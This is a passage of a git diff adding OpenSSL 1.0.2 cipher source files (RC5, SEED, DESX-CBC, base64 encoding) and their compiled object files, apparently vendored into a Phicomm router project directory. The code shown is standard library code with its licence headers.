+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+
+#ifndef OPENSSL_NO_RC5
+
+# include <openssl/evp.h>
+# include <openssl/objects.h>
+# include "evp_locl.h"
+# include <openssl/rc5.h>
+
+static int r_32_12_16_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                               const unsigned char *iv, int enc);
+static int rc5_ctrl(EVP_CIPHER_CTX *c, int type, int arg, void *ptr);
+
+typedef struct {
+    int rounds;                 /* number of rounds */
+    RC5_32_KEY ks;              /* key schedule */
+} EVP_RC5_KEY;
+
+# define data(ctx)       EVP_C_DATA(EVP_RC5_KEY,ctx)
+
+IMPLEMENT_BLOCK_CIPHER(rc5_32_12_16, ks, RC5_32, EVP_RC5_KEY, NID_rc5,
+                       8, RC5_32_KEY_LENGTH, 8, 64,
+                       EVP_CIPH_VARIABLE_LENGTH | EVP_CIPH_CTRL_INIT,
+                       r_32_12_16_init_key, NULL, NULL, NULL, rc5_ctrl)
+
+static int rc5_ctrl(EVP_CIPHER_CTX *c, int type, int arg, void *ptr)
+{
+    switch (type) {
+    case EVP_CTRL_INIT:
+        data(c)->rounds = RC5_12_ROUNDS;
+        return 1;
+
+    case EVP_CTRL_GET_RC5_ROUNDS:
+        *(int *)ptr = data(c)->rounds;
+        return 1;
+
+    case EVP_CTRL_SET_RC5_ROUNDS:
+        switch (arg) {
+        case RC5_8_ROUNDS:
+        case RC5_12_ROUNDS:
+        case RC5_16_ROUNDS:
+            data(c)->rounds = arg;
+            return 1;
+
+        default:
+            EVPerr(EVP_F_RC5_CTRL, EVP_R_UNSUPORTED_NUMBER_OF_ROUNDS);
+            return 0;
+        }
+
+    default:
+        return -1;
+    }
+}
+
+static int r_32_12_16_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                               const unsigned char *iv, int enc)
+{
+    RC5_32_set_key(&data(ctx)->ks, EVP_CIPHER_CTX_key_length(ctx),
+                   key, data(ctx)->rounds);
+    return 1;
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_rc5.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_rc5.o
new file mode 100644
index 0000000000000000000000000000000000000000..ef3d77cb7ae75d4e68e52855831a020feeaa94e1
GIT binary patch
literal 1080
zcmbVL%}T>S5T11F?@4chmv~aqE~#2X4-zP~7ZEQ7JxLOSLdg%w2JEH2f{){|ujCWx
zOtOp1Zt9@}vorI}e6zE=$;asKw&OUU#DN?5ixdj*rGb78`>+jL0OR5C+C7?tRVpg?
zil1|@*T1alus=WZxOZ{fz)i0%njO?N)bafUIsgm880vpQ+jrsnr>%yyPE0+qdyB9o
zyRmvIo4{b*1`%O6ktOkS5e;|*z{^=8f)K4J8vCX^5x)!IFM$Yvhh+&o%912b5lb@>
zbG(;cDS~J!<JYv}d6DIDA!gQoD+2q-qdPTE<}c}|J%3$sfGc6<yZLq2UQGTWmTaP~
z%0ERe_4H76@nvwLgXpXMl^tl9UOLqS%~w1HjnLUZHNUW27P!(XLub{6`k7qHf6AhT
nw8T?N(4NHc&$I51QV()a%Ijjzzl%xp?y3Gs7C!1^^iBRRR_iz@

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_seed.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_seed.c
new file mode 100644
index 0000000..c948a8f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_seed.c
@@ -0,0 +1,82 @@
+/* crypto/evp/e_seed.c -*- mode:C; c-file-style: "eay" -*- */
+/* ====================================================================
+ * Copyright (c) 2007 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <openssl/opensslconf.h>
+#ifndef OPENSSL_NO_SEED
+# include <openssl/evp.h>
+# include <openssl/err.h>
+# include <string.h>
+# include <assert.h>
+# include <openssl/seed.h>
+# include "evp_locl.h"
+
+static int seed_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                         const unsigned char *iv, int enc);
+
+typedef struct {
+    SEED_KEY_SCHEDULE ks;
+} EVP_SEED_KEY;
+
+IMPLEMENT_BLOCK_CIPHER(seed, ks, SEED, EVP_SEED_KEY, NID_seed,
+                       16, 16, 16, 128, 0, seed_init_key, 0, 0, 0, 0)
+
+static int seed_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                         const unsigned char *iv, int enc)
+{
+    SEED_set_key(key, ctx->cipher_data);
+    return 1;
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_seed.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_seed.o
new file mode 100644
index 0000000000000000000000000000000000000000..dc0b5b0da63022f80faf9801b868aee5e8111ab9
GIT binary patch
literal 4344
zcmb`LTWl0n7=X`o3oRF?i`Pa7?gKH~NGB~4=qlEoWp{ffoyyvF+lGtF?slLJy}3KZ
zEiuvv8YasE&&CH6UyLvCW;GhxXpB)Xm>{BPf<}YTNP<T2g5v+roU@%CX2FPmGJF2>
zo&R#qKj+L$c5h6NS4k4#B9T@y*W;9smb>Qku&stk9g)c|bu0f+d$r>?9C=dh(X3C^
zq-Oo9c5Bw@B(+X<QR`1Np_R-=qLntR)*G(s4c9tCfA0>`VtXN4Z1=x|8THb}Af5TH
z^+$|8<%1tObG}uRKAio4T9@8-z@=6?^KC1&zMyqSKch1jS|RKcM3*j5>5{pO$HP!|
zn9WlddCN9+tGZ2nMoqns)77ls64bh;6~_urF0|Qf57DXeI(qfe-afU5hGsPDOnE`q
zlk`2XMhSP(y7)zEeWE^1Upi-QprP5^dbJo`<?qq0YaONNs-RZXR~4xBm2O?84YP?3
z>vv7MtVuuFX=&)2l-ft@+Gb~ud(QKY%F0UG-uFM1RWCWADwkF5ReRK=+MVoD6SP>P
zX9uda(8=c-^#&-?Um6tLI-^-9n$HzG{Ir-XXr;9e!G2h&OS5)RE%bH%d(T49(gG~F
zbBAuDqoG@BVc+-x;DzF~x1AB^chcSY7y4p|k1=_U>f88C-ez1JULwTDV{j{(yw#w`
z*dkYba1B)+Hf}WO?%Yam+qm(uKropZA2G)RA>~n}sj+$exZQ1jVNH|Lw6?*)P7tgc
z=EpnT_EZw*F^!C`_g>IZq&=NPD)^=4OKWP6K;fgnR@fti9K|*+`wv&?a{VD+Ob(Q)
zV{-7|f~ef|^1`Uxvacp4hpTqWEpfR?m4gvE5RvO6vOgl%V*Gv<XF0Z1_IJv)BmwI4
zjF+%YVEj17r}N{tV|+~xCuG_yCpu*sk;83Xsq8tQVlnSz&ban^wxKs;JbUf1q(eSf
zTB$mMYgcjYD$Wh&v&VBjSoiHL&Qgp6g3R<_2Ly(7dsSfQUrErknq0ZzHSVi$I(_9`
zFyG4ukwjSxpvo1;t}n0$8Rvcb9s>(9{xP&D_C1F7akwx}FIyY;YiE2RJ1BPDft`R$
zg54Wn_I=Pt`4TSV)7Syw{37Vcw<84M{3__kxp0nspNsQxhu6BhW!*;>m36n`BUq)I
z#Ybvxf?I&#UJ&J30ABpX3jA;d{(1%eRt5eM@VlWx+gbhje*K*BA%XwEctPMlGrnKo
z#7N~0qhHAqY*N`wHkBP58!&QCe{f{bOzkoz*yxT-^O}}<2BSMN^ZG`%+)uUXn<A>7
z+7yp>#ky17YDABvNLMTtwbK|Q+1$jK>43c9q;W=_H1iA~52l{SFc$~0o`k&+3{B=b
zw%1%AqRe%`oscf53kserJlogV2hl4CK}3Gs!8X4SbZ)<noddML-^Jf_@dsS|N(CNg
z_Xp$DyX<!|j*Sf03g({|_`5KMvRB|+9ZZS>=kv#0C>Rz^`1ucjj>0*A4ip?*=G=Z#
z;QV=VR^Z(JyukT$sfDeN=jHZcfirg!U<%HiEzu?e0_Sli1<v!H7C4_juQ!j+>(I~U
z!#O{v1%dN(dQjl}oW3S-eol#!pBOgN8EDO%(++SgXAGqk(<qok=}((!qGa-UqSzGs
zs42NoWoR^;9wJJ1ba>bp0o##L(@@}>qcLx$v%6S-=g7D+mKz;2a^?h!VGN{p<kG_i
ztH_--0dU79E)>FqS^tRprU7H+C|l$E3(rKjOdQ3}9__Wv0iTbk@;3zE*AFw!zpor`
zLQV;JIT!P<W-<S(|GEnK&$Ik|zwrD4uCTTlTCerjFL4Z}nH{bl-=^aFHDI`=Cb-<v
zhe1IeahmckUq5d<VT9{tBT)7+e>X#2w9Np+x2;(21I#}FV{YN|=WGus7*q6rgZUp5
z5{mxg;ESeVxZHA<)sH`)uzt9uxIf=NUb!(&AKTDVY-0Gg!95=S_+=vQ9YDm-K3T*M
WL}58(Sq1-NIAM_ePE-CB{r>?@9!~-Q

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_xcbc_d.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_xcbc_d.c
new file mode 100644
index 0000000..3430df9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_xcbc_d.c
@@ -0,0 +1,130 @@
+/* crypto/evp/e_xcbc_d.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+
+#ifndef OPENSSL_NO_DES
+
+# include <openssl/evp.h>
+# include <openssl/objects.h>
+# include "evp_locl.h"
+# include <openssl/des.h>
+
+static int desx_cbc_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                             const unsigned char *iv, int enc);
+static int desx_cbc_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                           const unsigned char *in, size_t inl);
+
+typedef struct {
+    DES_key_schedule ks;        /* key schedule */
+    DES_cblock inw;
+    DES_cblock outw;
+} DESX_CBC_KEY;
+
+# define data(ctx) ((DESX_CBC_KEY *)(ctx)->cipher_data)
+
+static const EVP_CIPHER d_xcbc_cipher = {
+    NID_desx_cbc,
+    8, 24, 8,
+    EVP_CIPH_CBC_MODE,
+    desx_cbc_init_key,
+    desx_cbc_cipher,
+    NULL,
+    sizeof(DESX_CBC_KEY),
+    EVP_CIPHER_set_asn1_iv,
+    EVP_CIPHER_get_asn1_iv,
+    NULL,
+    NULL
+};
+
+const EVP_CIPHER *EVP_desx_cbc(void)
+{
+    return (&d_xcbc_cipher);
+}
+
+static int desx_cbc_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                             const unsigned char *iv, int enc)
+{
+    DES_cblock *deskey = (DES_cblock *)key;
+
+    DES_set_key_unchecked(deskey, &data(ctx)->ks);
+    memcpy(&data(ctx)->inw[0], &key[8], 8);
+    memcpy(&data(ctx)->outw[0], &key[16], 8);
+
+    return 1;
+}
+
+static int desx_cbc_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                           const unsigned char *in, size_t inl)
+{
+    while (inl >= EVP_MAXCHUNK) {
+        DES_xcbc_encrypt(in, out, (long)EVP_MAXCHUNK, &data(ctx)->ks,
+                         (DES_cblock *)&(ctx->iv[0]),
+                         &data(ctx)->inw, &data(ctx)->outw, ctx->encrypt);
+        inl -= EVP_MAXCHUNK;
+        in += EVP_MAXCHUNK;
+        out += EVP_MAXCHUNK;
+    }
+    if (inl)
+        DES_xcbc_encrypt(in, out, (long)inl, &data(ctx)->ks,
+                         (DES_cblock *)&(ctx->iv[0]),
+                         &data(ctx)->inw, &data(ctx)->outw, ctx->encrypt);
+    return 1;
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_xcbc_d.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_xcbc_d.o
new file mode 100644
index 0000000000000000000000000000000000000000..e35f1f96c460959f97a123413f01811c2d8edf10
GIT binary patch
literal 2696
zcmbtV-D@0G6u+~ZHmlT|wFoX$WDt=A+hL<c(-PL1-JQ){I+`^fwYEv8o7u4&Vs@9^
z*}5yGMhc-rT+Kfq_~3(YKIlW*7rPXpF9m(EkM#qwL{OxHpq6^h%)QAtndCta+<VUX
z-Sc(Ny>sUs-6+H)i3pNNhHPsBCFJJ*ZCUk1l?)L|?hQTpr}kR$iw8cvq@66f-)OT%
z_m(zObbp^^?yYI&{-wQI>>WK^?2RkN$S=mouP-0Ff8jV=JJDIoC9h#Vqn8_I{qHj+
z)_eDgr@Je_N_Sx*8*!LS?G)>On<+|P{`?tpH?Jbb`kNWn|1QJa+id95uUY@64CEO%
zq(7Ln={&^~VC=}aub(}=fyvLzYjfJXc2+ZQ;C`U!`%v_~5?gz#!`wSw4Qx&Cu(jy~
zbJtfev#%yW#d5tcr_aoL{;anTAaVnz5{v|l6z4JEd(rw{i@~*tT<*9$JiE}YIc@ov
z^1PBhGWufMQ%5g7msZk8M|{|K8UU7rft5|XGE1P2>xf|&ksk9Ik=~vnQYR@LIxv`6
zhu+Kq{sdq93VDGhKZqGL^?qEZa&JJV!|(0O)AZ{8JRQ3{s8h8{*(5EUpe#$(i=JGd
zOrxqs#|kv9(cvtWvow{Z$t+Efry=A;9$!VS)8uL_Pg9rUc`7$(N~1{)?6AI%aUJM@
z&-R@0SO>^&52B3XkvANBA-eHzuQ)^s6V?z5#PNCq81@Qrp{t-HDKI3j`<_Zp`OKT+
z0XzUhHF$G&Qk*=r69gnq9^M5X+<}h+g7+azQvgKa)-HG#@Pn|kBsLsKoXsl8QE@)p
z1t+%Iu@)?|qFAJ2w>l;&)?%Y-H@Ef0+M;7F*<DicjrqDcVN7N<!<;M>ru7+fM#~zy
zN%H!%Z)Ml4X1C#ZK+E<5nC+TXwXG$)LiCd*QzZ11T(QLTDHAQrt=g!$cp(U%55TzJ
zGEP8vLnw^D`9pXWL7*`HqYr!d5Xi#*ao#_CAMn%#j_(E%F5{ZGS2D;*0{1mS#<+m^
zqXGo3avAZ1Tt+5y8DrxRw88~}i@cwNaB=QLX?2&K@&a(D>GP_Pn)aJz#j!gMQ7UDp
zOq7LIizpt7I!a2jP86%YylmINs#bSw1zxEmEvIZPas7O)tu&hThTU|!+}p02Z#2ux
zwkZ04a2b5DH-X=r7ftnM_^xp=Kp~YJf;BvAHDH6H>ir4`ImdDQKG0Wu+2VYk;duB3
znhPi5al-In9`nEYzpzXGb39S-y}}Y?oB}ioa@77mir7Cw;r-_T!&GS)LGpgA06ZH6
zK^FTL+z4Pn(;tLE5R9;$0}Nlu;5UFSce%feN`OTD0&+k=)3ASn0~^AS^RRy%@TmTY
z3(2@2-XDDBg}=BzQMu9OI?sQT@8c1`aD@Hwj}pE+0Ff(L6wv2B+nRZ}Egj#QD1XL3
Ms7qUxz7Y2R2W!hZu>b%7

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/encode.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/encode.c
new file mode 100644
index 0000000..d1d8a07
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/encode.c
@@ -0,0 +1,452 @@
+/* crypto/evp/encode.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/evp.h>
+
+#ifndef CHARSET_EBCDIC
+# define conv_bin2ascii(a)       (data_bin2ascii[(a)&0x3f])
+# define conv_ascii2bin(a)       (data_ascii2bin[(a)&0x7f])
+#else
+/*
+ * We assume that PEM encoded files are EBCDIC files (i.e., printable text
+ * files). Convert them here while decoding. When encoding, output is EBCDIC
+ * (text) format again. (No need for conversion in the conv_bin2ascii macro,
+ * as the underlying textstring data_bin2ascii[] is already EBCDIC)
+ */
+# define conv_bin2ascii(a)       (data_bin2ascii[(a)&0x3f])
+# define conv_ascii2bin(a)       (data_ascii2bin[os_toascii[a]&0x7f])
+#endif
+
+/*-
+ * 64 char lines
+ * pad input with 0
+ * left over chars are set to =
+ * 1 byte  => xx==
+ * 2 bytes => xxx=
+ * 3 bytes => xxxx
+ */
+#define BIN_PER_LINE    (64/4*3)
+#define CHUNKS_PER_LINE (64/4)
+#define CHAR_PER_LINE   (64+1)
+
+static const unsigned char data_bin2ascii[65] = "ABCDEFGHIJKLMNOPQRSTUVWXYZ\
+abcdefghijklmnopqrstuvwxyz0123456789+/";
+
+/*-
+ * 0xF0 is a EOLN
+ * 0xF1 is ignore but next needs to be 0xF0 (for \r\n processing).
+ * 0xF2 is EOF
+ * 0xE0 is ignore at start of line.
+ * 0xFF is error
+ */
+
+#define B64_EOLN                0xF0
+#define B64_CR                  0xF1
+#define B64_EOF                 0xF2
+#define B64_WS                  0xE0
+#define B64_ERROR               0xFF
+#define B64_NOT_BASE64(a)       (((a)|0x13) == 0xF3)
+
+static const unsigned char data_ascii2bin[128] = {
+    0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+    0xFF, 0xE0, 0xF0, 0xFF, 0xFF, 0xF1, 0xFF, 0xFF,
+    0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+    0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+    0xE0, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+    0xFF, 0xFF, 0xFF, 0x3E, 0xFF, 0xF2, 0xFF, 0x3F,
+    0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3A, 0x3B,
+    0x3C, 0x3D, 0xFF, 0xFF, 0xFF, 0x00, 0xFF, 0xFF,
+    0xFF, 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06,
+    0x07, 0x08, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E,
+    0x0F, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16,
+    0x17, 0x18, 0x19, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+    0xFF, 0x1A, 0x1B, 0x1C, 0x1D, 0x1E, 0x1F, 0x20,
+    0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28,
+    0x29, 0x2A, 0x2B, 0x2C, 0x2D, 0x2E, 0x2F, 0x30,
+    0x31, 0x32, 0x33, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+};
+
+void EVP_EncodeInit(EVP_ENCODE_CTX *ctx)
+{
+    ctx->length = 48;
+    ctx->num = 0;
+    ctx->line_num = 0;
+}
+
+void EVP_EncodeUpdate(EVP_ENCODE_CTX *ctx, unsigned char *out, int *outl,
+                      const unsigned char *in, int inl)
+{
+    int i, j;
+    unsigned int total = 0;
+
+    *outl = 0;
+    if (inl == 0)
+        return;
+    OPENSSL_assert(ctx->length <= (int)sizeof(ctx->enc_data));
+    if ((ctx->num + inl) < ctx->length) {
+        memcpy(&(ctx->enc_data[ctx->num]), in, inl);
+        ctx->num += inl;
+        return;
+    }
+    if (ctx->num != 0) {
